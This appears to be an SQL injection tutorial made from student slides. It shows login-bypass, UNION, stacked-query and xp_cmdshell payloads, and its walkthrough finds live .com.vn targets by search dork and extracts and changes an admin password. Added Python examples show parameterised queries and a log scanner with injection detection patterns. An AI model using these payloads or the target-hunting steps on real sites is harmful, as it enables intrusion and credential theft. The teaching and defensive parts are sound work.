SQL Injection

Contents:
- What is SQL Injection?
- Types of SQL Injection attacks
- SQL injection attack technique
- Prevention
- Demo
What is SQL Injection?

SQL injection is an attack technique that exploits weaknesses in how a web application validates its input, together with the error messages of the database management system, to "inject" and execute SQL statements the application never intended to run. Its consequences are severe: the attacker can delete and modify data, gaining full control over the application's database and even over the server the application runs on. The flaw typically appears in web applications whose data is managed by a DBMS such as SQL Server, MySQL, Oracle, DB2 or Sybase.

Types of SQL Injection attacks

There are four common forms:
- bypassing the login check (authorization bypass)
- using the SELECT statement
- using the INSERT statement
- using stored procedures [2], [3]

Attack type: bypassing the login check

The attacker logs in by exploiting flaws in the SQL statements the web application uses to operate on its database. In this case the application typically uses two pages: an HTML page that displays the input form and an ASP page that processes what the user submitted. Example: login.htm posts its fields to an ASP page like the following.
    <%
    ' The slide kept only the lines from objRS.Open down; the query construction is
    ' reconstructed from the SQL shown below, and the form field names are assumed.
    Dim vUsrName, vPassword, objRS, strSQL
    vUsrName = Request.Form("fUSRNAME")
    vPassword = Request.Form("fPASSWORD")
    strSQL = "SELECT * FROM T_USERS WHERE USR_NAME ='" & vUsrName & "' and USR_PASSWORD= '" & vPassword & "'"
    Set objRS = Server.CreateObject("ADODB.Recordset")
    objRS.Open strSQL, "DSN=..."
    If (objRS.EOF) Then
        Response.Write "Invalid login."
    Else
        Response.Write "You are logged in as " & objRS("USR_NAME")
    End If
    Set objRS = Nothing
    %>

The user enters the following string into both the username and password fields of login.htm: ' OR ' ' = ' . The query that is then executed becomes:

    SELECT * FROM T_USERS WHERE USR_NAME ='' OR ''='' and USR_PASSWORD= '' OR ''=''

This query is syntactically valid and returns every row of T_USERS, and the code that follows treats this illegitimate login as a legitimately logged-in user.

Attack type: using the SELECT statement

To carry out this kind of attack, the attacker must be able to read and exploit the details leaked by the system's error messages in order to find the weak points from which to start. Typically there is a page that receives the ID of a news item to display and then queries the content of the item with that ID:

    <%
    Dim vNewsID, objRS, strSQL
    vNewsID = Request("ID")
    strSQL = "SELECT * FROM T_NEWS WHERE NEWS_ID =" & vNewsID
    Set objRS = Server.CreateObject("ADODB.Recordset")
    objRS.Open strSQL, "DSN=..."
    Set objRS = Nothing
    %>

With a crafted ID the SQL query returns every article in the table, because the statement executed is:

    SELECT * FROM T_NEWS WHERE NEWS_ID=0 or 1=1 ' UNION ALL SELECT OtherField FROM OtherTable WHERE ' '='

Now, apart from the first query (which fails on its own), the program also executes the statement that follows the UNION keyword. Appending ' UNION SELECT name FROM sysobjects WHERE xtype = 'U' lists the names of all user tables in the database.

Attack type: using the INSERT statement

An indispensable feature of most applications is that, after registering successfully, users can view and edit their own information. SQL injection can be used here when the system does not validate the information entered. For example, an INSERT statement has the form INSERT INTO TableName VALUES('Value One', 'Value Two', 'Value Three'). If the code that builds the SQL statement looks like this:

    <%
    strSQL = "INSERT INTO TableName VALUES('" & strValueOne & "', '" _
             & strValueTwo & "', '" & strValueThree & "')"
    Set objRS = Server.CreateObject("ADODB.Recordset")
    objRS.Open strSQL, "DSN=..."
    Set objRS = Nothing
    %>

Attack type: using stored procedures

An attack through stored procedures does very serious damage if the application runs under the system administrator account 'sa'. For example, if the injected string is changed to ' ; EXEC xp_cmdshell 'cmd.exe dir C: ', the system lists the directory of the C:\ drive on which the server is installed. How destructive the attack is depends only on the command placed after cmd.exe.

SQL injection attack technique

Step 1: Find targets.
Step 2: Check the web page for weaknesses.
Step 3: Obtain data from the database using ODBC error messages.
Step 4: Determine the names of the columns in the table.
Step 5: Collect the important data.
Step 6: Act on the results found.
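The login and news pages described above (T_USERS and T_NEWS) re-created in Python over an in-memory SQLite database, as an added example that is not part of the original slides: each query is shown once built by string concatenation, exactly as the ASP code does it, and once with bound parameters, so the effect of the same input on both can be compared. Table rows and the news_id type check are assumptions of the example.

```python
import sqlite3

# Constructed in-memory stand-in for the T_USERS and T_NEWS tables used above; the
# column names come from the slides, the rows are made up for this example.
def make_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE T_USERS (USR_NAME TEXT, USR_PASSWORD TEXT);
        INSERT INTO T_USERS VALUES ('alice', 's3cret');
        CREATE TABLE T_NEWS (NEWS_ID INTEGER, TITLE TEXT);
        INSERT INTO T_NEWS VALUES (1, 'first story'), (2, 'second story');
    """)
    return db

def login_concat(db, user, pwd):
    # Same construction as the ASP login page: both fields are spliced into the SQL
    # text, so a quote in either field closes the literal and the rest is parsed as SQL.
    sql = ("SELECT USR_NAME FROM T_USERS WHERE USR_NAME = '" + user
           + "' AND USR_PASSWORD = '" + pwd + "'")
    return [row[0] for row in db.execute(sql)]      # non-empty means "logged in"

def login_param(db, user, pwd):
    # Placeholders: the values travel separately from the SQL text and are only ever
    # compared as data, so ' OR ''=' is just a string that matches no user.
    sql = "SELECT USR_NAME FROM T_USERS WHERE USR_NAME = ? AND USR_PASSWORD = ?"
    return [row[0] for row in db.execute(sql, (user, pwd))]

def news_concat(db, news_id):
    # The T_NEWS page: the ID is numeric, so no quote is needed; "0 or 1=1" suffices.
    return [row[0] for row in db.execute("SELECT TITLE FROM T_NEWS WHERE NEWS_ID = " + news_id)]

def news_param(db, news_id):
    # Validate the type before binding; anything that is not a bare integer is refused.
    if not news_id.isdigit():
        raise ValueError("NEWS_ID must be a non-negative integer")
    return [row[0] for row in db.execute("SELECT TITLE FROM T_NEWS WHERE NEWS_ID = ?", (int(news_id),))]

if __name__ == "__main__":
    db = make_db()
    bypass = "' OR ''='"
    print("concat login:", login_concat(db, bypass, bypass))   # ['alice']: every row matched
    print("param login: ", login_param(db, bypass, bypass))    # []
    print("concat news: ", news_concat(db, "0 or 1=1"))        # both stories
    try:
        news_param(db, "0 or 1=1")
    except ValueError as exc:
        print("param news:   rejected:", exc)
```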
Finding targets

You can use any search engine on the Internet to find pages such as login, search or feedback forms, and you can tailor the search query to your needs.

Run the following search: inurl:php?id= site:com.vn
The search returned a list of candidate URLs (the group's results).
Note: not every page can be attacked.

Checking the web page for weaknesses

You can append some commands to the URL, or enter them in the login, search or feedback forms, to provoke an error. Below are some of the ways our group added input and detected errors.

Obtaining data from the database using ODBC error messages

This is the most important step, and it requires both technique and an understanding of the database. The table INFORMATION_SCHEMA.COLUMNS contains the names of all columns of every table. It can be exploited as follows:

    http://vitcon/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=admin_login--

Output:

    Microsoft OLE DB Provider for ODBC Drivers error 80040e07
    [Microsoft][ODBC SQL Server Driver][SQL Server]ORDER BY items must appear in the select list if the statement contains a UNION operator.
    /index.asp, line 5

Collecting the important data

We have to determine the names of the important tables and columns. The first login_name in the admin_login table can be obtained as follows:

    http://vitcon/index.asp?id=10 UNION SELECT TOP 1 login_name FROM admin_login
You can easily see that the first admin user has the login_name aaa. Then use the user name found to obtain the password:

    http://vitcon/index.asp?id=10 UNION SELECT TOP 1 password FROM admin_login WHERE login_name=aaa

You now receive the password of aaa, which is bbb.
Acting on the results found

Once you have the names of all columns in the table, you can UPDATE or INSERT a new record into it. To change the password of aaa:

    http://vitcon/index.asp?id=10 ;UPDATE admin_login SET password=ccc WHERE login_name=aaa

Or log in directly and act with that user's privileges.

Prevention

There must be strict control over, and limits on, the data-handling privileges of the database account the web application uses. Ordinary applications should avoid running with privileges such as dbo or sa: the more restricted the account, the smaller the damage. Remove any technical details from the messages returned to the user when the application fails; error messages usually reveal technical details that let an attacker learn the system's weak points.

Demo
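As a defender-side complement to the technique walkthrough above, here is an added example (not from the original slides) that scans web server access-log lines for the probe patterns the walkthrough describes: a quote appended to a parameter, UNION SELECT against INFORMATION_SCHEMA, a stacked ;UPDATE and an xp_cmdshell call, and flags 5xx responses to such requests as possible error-message leaks. The log lines, paths and addresses are constructed.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Constructed access-log lines (not taken from the slides). The requests mirror the probes
# described above, plus two ordinary requests for contrast.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0700] "GET /news_detail.php?id=19 HTTP/1.1" 200 5120
10.0.0.9 - - [01/Jan/2024:10:00:07 +0700] "GET /news_detail.php?id=19' HTTP/1.1" 500 312
10.0.0.9 - - [01/Jan/2024:10:00:12 +0700] "GET /page.asp?id=17%27 HTTP/1.1" 500 298
10.0.0.9 - - [01/Jan/2024:10:00:30 +0700] "GET /index.asp?id=10%20UNION%20SELECT%20TOP%201%20COLUMN_NAME%20FROM%20INFORMATION_SCHEMA.COLUMNS HTTP/1.1" 500 410
10.0.0.9 - - [01/Jan/2024:10:01:02 +0700] "GET /index.asp?id=10;UPDATE%20admin_login%20SET%20password=ccc HTTP/1.1" 200 220
10.0.0.9 - - [01/Jan/2024:10:01:40 +0700] "GET /index.asp?id=10';EXEC%20xp_cmdshell%20'dir' HTTP/1.1" 200 220
10.0.0.7 - - [01/Jan/2024:10:02:00 +0700] "GET /search.php?q=o'reilly HTTP/1.1" 200 900
"""

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+" (\d{3})')
# Keywords from the walkthrough; matched case-insensitively after URL decoding.
KEYWORDS = re.compile(r"union\s+select|information_schema|xp_cmdshell|;\s*(?:update|insert|exec)\b", re.I)

def classify_query(query):
    """Reasons a raw query string looks like an injection probe; [] when it looks clean."""
    decoded = unquote_plus(query)
    reasons = []
    if KEYWORDS.search(decoded):
        reasons.append("SQL keyword in query string")
    for pair in decoded.split("&"):
        name, _, value = pair.partition("=")
        # A value ending in a quote is the "append ' and watch for an error" probe.
        # A quote inside a value (o'reilly) is ordinary text and is left alone.
        if value.endswith("'"):
            reasons.append(f"{name}: trailing quote (error-probe pattern)")
    return reasons

def scan_log(text):
    """Return [(line_no, reasons)] for every request in the log that looks like a probe."""
    hits = []
    for line_no, line in enumerate(text.splitlines(), 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        reasons = classify_query(urlsplit(m.group(1)).query)
        if reasons:
            if int(m.group(2)) >= 500:
                reasons.append("server returned 5xx: an error page may have leaked details")
            hits.append((line_no, reasons))
    return hits

if __name__ == "__main__":
    for line_no, reasons in scan_log(SAMPLE_LOG):
        print(line_no, "; ".join(reasons))
```

A keyword list like this catches the textbook payloads from the walkthrough but not obfuscated ones; it is a triage aid for reviewing logs, not a substitute for parameterised queries and a restricted database account.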